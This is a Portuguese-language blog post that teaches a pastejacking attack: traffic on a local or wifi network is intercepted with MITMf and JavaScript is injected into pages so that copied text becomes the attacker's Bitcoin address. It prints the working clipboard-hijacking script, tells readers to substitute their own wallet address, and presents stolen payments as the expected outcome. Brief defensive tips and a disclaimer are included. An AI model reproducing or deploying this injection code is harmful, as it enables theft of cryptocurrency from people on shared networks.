Alterando endereços de bitcoin em uma rede wifi - Pastejacking

COMPARTILHAR:

Whatsapp Telegram Twitter Facebook Reddit

No vídeo abaixo é demonstrado uma tentativa de ataque direcionado a alterar endereços de bitcoin em uma rede local, mas você pode fazer isso em rede wifi, basta usar sua interface wifi no comando do script.


Atenção: não nos responsabilizamos pelo seus atos ou de nossos leitores, este artigo serve apenas para compartilhar conhecimento.

Certamente vocês se lembram do nosso vídeo ensinando a técnica do pastejacking que consiste em inserir conteúdo malicioso no conteúdo que o usuário pretende copiar.

Com isso em mente, no vídeo abaixo é demonstrado uma tentativa de ataque direcionado a alterar endereços de bitcoin em uma rede local, mas você pode fazer isso em rede wifi, basta usar sua interface wifi no comando do script.

Será necessário ter instalado o mitmf em sua máquina, portanto clique aqui e saiba mais. Foi utilizado uma máquina rodando Kali Linux no vídeo abaixo, confira nossa playlist para mais informações sobre o sistema clicando aqui.


Se o vídeo acima não carregar, clique aqui para assistir.

Como pode notar no vídeo, foi utilizado um ataque mitm (man in the middle) passando o tráfego da rede pela nossa máquina para que seja possível injetar um código javascript que permite inserir um texto fixo que será copiado quando o usuário copiar qualquer coisa na página que teve o javascript inserido.


Código javascript utilizado:

document.addEventListener('copy', function(e){
    console.log(e);
    e.clipboardData.setData('text/plain', 'BITCOIN-ADDRESS');
    e.preventDefault();
});


Substitua o trecho em vermelho pelo seu endereço de bitcoin, mantenha as aspas simples e salve o arquivo com a extensão .js .

Se você injetou com sucesso o script e um usuário que está conectado a rede wifi gosta de utilizar bitcoin para realizar pagamentos, existe uma probabilidade alta de você interceptar alguns bitcoins. Para isso, temos que supor que o usuário vá realizar um pagamento com bitcoins - saiba mais sobre criptomoedas clicando aqui.

Suponha que o usuário acessa algum site para comprar um produto e o vendedor aceita bitcoins como pagamento. Este usuário então copia o endereço de bitcoin do vendedor e para realizar o pagamento ele cola o endereço em sua carteira (seja no PC ou celular) para autorizar o envio de bitcoins para o vendedor. Mas infelizmente, o usuário não percebe que na verdade o que foi copiado não foi o endereço de bitcoin do vendedor... mas sim o endereço de bitcoin do hacker, quando ele se der conta que enviou os bitcoins para o endereço errado pode ser que seja muito tarde para reverter a transação, ficando no prejuízo.

O código javascript utilizado é simples, caso tenha interesse em algo mais elaborado clique aqui e confira.

Mas como evitar que casos como este aconteça comigo? Você pode evitar ataques mitm como demonstra o vídeo abaixo:


As versões recentes dos principais navegadores conseguem impedir que o atacante injete o código malicioso em sites que utilizam https, mas ainda é possível burlar essa proteção. Saiba mais clicando aqui. Também é recomendado utilizar extensões que bloqueiam javascript como NoScript.

A dica mais preciosa é conferir o endereço de bitcoin por completo antes de efetuar uma transação!

O conteúdo especificou bitcoins simplesmente por ser a criptomoeda mais utilizada... mas este tipo de ataque pode ser feito usando endereços de outras criptomoedas, caso você sabe que o alvo goste de utilizar alguma moeda em específico.



Fontes: https://github.com/dxa4481/Pastejacking
https://security.love/Pastejacking/
https://www.limontec.com/2018/03/pastejacking-hackeando-ctrlc-ctrlv.html

COMENTÁRIOS

Nome

#ann,25,#HK,30,#LTCode,130,Artigo - Diversos,156,Artigo - Games,201,Artigo - Tecnologia,615,autor-thomaz,7,Coluna - Alternative World,24,Coluna - Fail,12,Coluna - Tec Line,14,Criptomoeda,72,Curiosidades - Diversos,49,Curiosidades - Tecnologia,50,en,2,estudo,8,HN,12,logica,14,Pentest,23,Programar C,29,Programar POO,6,Programar Python,6,Programar Shell,25,Programar verilog,12,qradar,4,Raspberry Pi,15,Redes,3,root,117,Shorty Awards,1,Smartphones - Reviews,33,Teoria,10,Top Nostalgia,2,VPN,19,WhatsApp,46,
ltr
item
Limon Tec: Alterando endereços de bitcoin em uma rede wifi - Pastejacking
Alterando endereços de bitcoin em uma rede wifi - Pastejacking
No vídeo abaixo é demonstrado uma tentativa de ataque direcionado a alterar endereços de bitcoin em uma rede local, mas você pode fazer isso em rede wifi, basta usar sua interface wifi no comando do script.
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqq2zyO2kI2wafAbIo6l2Na9TWxuJejiv9RM_rDcb8pCww5uo-GcEgq1dZUsUUnBiQK3vE7kYI2YcvF7PhT6Y9BfJUCkiEsM5HfV_lI2qVjECUSFB6Ix5WRXVOlZQGiNIkSBvAA9JNf27h/s640/btcpastejacking.jpg
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqq2zyO2kI2wafAbIo6l2Na9TWxuJejiv9RM_rDcb8pCww5uo-GcEgq1dZUsUUnBiQK3vE7kYI2YcvF7PhT6Y9BfJUCkiEsM5HfV_lI2qVjECUSFB6Ix5WRXVOlZQGiNIkSBvAA9JNf27h/s72-c/btcpastejacking.jpg
Limon Tec
https://www.limontec.com/2018/04/pastejacking-bitcoin-address.html
https://www.limontec.com/
https://www.limontec.com/
https://www.limontec.com/2018/04/pastejacking-bitcoin-address.html
false
2157924926610706248
UTF-8
Carregar todos posts Não encontramos nenhum post VER TUDO Ler mais Responder Cancelar resposta Deletar Por Home PÁGINAS POSTS Ver tudo RECOMENDADO PARA VOCÊ LABEL ARQUIVO SEARCH TODOS POSTS Não encontramos nenhum post relacionado a sua requisição VOLTAR PÁGINA INICIAL Domingo Segunda Terça Quarta Quinta Sexta Sábado Dom Seg Ter Qua Qui Sex Sab Janeiro Fevereiro Março Abril Maio Junho Julho Agosto Setembro Outubro Novembro Dezembro Jan Fev Mar Abr Maio Jun Jul Ago Set Out Nov Dez apenas agora 1 minuto atrás $$1$$ minutes ago 1 hora atrás $$1$$ hours ago Ontem $$1$$ days ago $$1$$ weeks ago mais de 5 semanas atrás Seguidores Seguir ESTE CONTEÚDO ESTÁ BLOQUEADO PASSO 1: Compartilhe com seus amigos PASSO 2: Clique no link compartilhado Copiar Todo Código Selecionar Todo Código Todos códigos foram copiados para seu clipboard Não é possível copiar códigos / textos, por favor aperte [CTRL]+[C] (ou CMD+C no Mac) para copiar Tabela de conteúdo